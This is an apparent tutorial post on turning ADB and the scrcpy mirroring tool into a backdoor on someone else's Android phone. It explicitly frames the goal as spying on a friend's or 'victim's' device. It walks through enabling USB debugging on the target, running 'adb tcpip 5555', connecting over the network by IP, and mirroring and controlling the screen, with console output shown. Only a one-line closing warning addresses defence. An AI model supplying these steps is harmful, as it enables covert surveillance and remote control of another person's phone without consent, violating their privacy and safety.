Create Backdoor on Android Using ADB (Android Debug Bridge)

Introduction

Can you imagine creating a backdoor on Android using ADB (Android Debug Bridge). Suppose you want to spy on our friend’s mobile connected on any network, this tool will be the best to monitor/control the device. In the earlier post researchers of International Institute of Cyber Security demonstrated Android mobile hacking with ADB. Spanish version of the same can be accessed from Noticiasseguridad.

Now, coming to the scrcpy, this tool is a screen mirroring and open-source tool for all android devices. To use this tool, we required  ADB (Android Debug Bridge) on hackers machine and USB debugging option must be enabled on the targeted device. This does not need root access on mobile.

Environment

  • OS: Microsoft Windows [Version 10.0.18363.959], 64 Bit

Installation Steps

  • Click On Download to download the File.
  • After downloading, create a folder and extract the file.

Execution Steps

  • Before using scrcpy tool, we have to turn on debug mode in the android device. To turn on debug mode first, we have to enable the developer mode.
    • Follow these steps to enable developer/USB debugging mode.
      • Settings -> About Phone -> System Information -> More -> Build Number
    • Next, tap on build number more than 7 times, to enable developer mode and move to
      • Setting -> Developer Options -> Turn on USB debugging mode.
  • Now, connect the target mobile to the hacker’s machine using USB cable then choose the File transfer option to connect the machine and connect the target device.
  • Next, open CMD then move to scrcpy path and use this command adb tcpip 5555
C:\iiCyberSecurity\adb>adb tcpip 5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
error: device unauthorized.
This adb server's $ADB_VENDOR_KEYS is not set
Try 'adb kill-server' if that seems wrong.
Otherwise check for a confirmation dialog on your device.
  • Now, we will get a prompt on the target device. Click on ok to approve and again use the same command to verify  
C:\iiCyberSecurity\adb>adb tcpip 5555

C:\iiCyberSecurity\adb>
  • Now, unplug target’s USB cable from the machine and use this command adb connect <IP>:<Port>
  • To check the target’s IP address follow these setps Settings -> About Phone -> Status -> IP address.
C:\iiCyberSecurity\adb>adb connect 192.168.0.23:5555
connected to 192.168.0.23:5555

C:\iiCyberSecurity\adb>adb
  • Here, we successfully connected to the target device.
  • If the target is on 3g/4g/5g link, we will need his/her mobile public IP address.
  • Now use this command scrcpy.exe to screen mirror the target’s device.
Scrcpy - Target's Device
Scrcpy – Target’s Device
  • In the same way, we can see the log files on CMD (Command Prompt).
  • After, connecting to the device. We can monitor each and every activity on the victim’s mobile.
  • Here, we have a few options to control the victim’s device.
Scrcpy - Shortcuts
Scrcpy – Shortcuts
  • Using this shortcut options we can control any android device.

Conclusion

As we saw on how to create backdoor on Android Using ADB and take control to monitor the targeted android device. It makes it easier for hackers to take control. So it is always recommended not to give your mobile to anybody. Giving your mobile for few minutes can also be unsafe.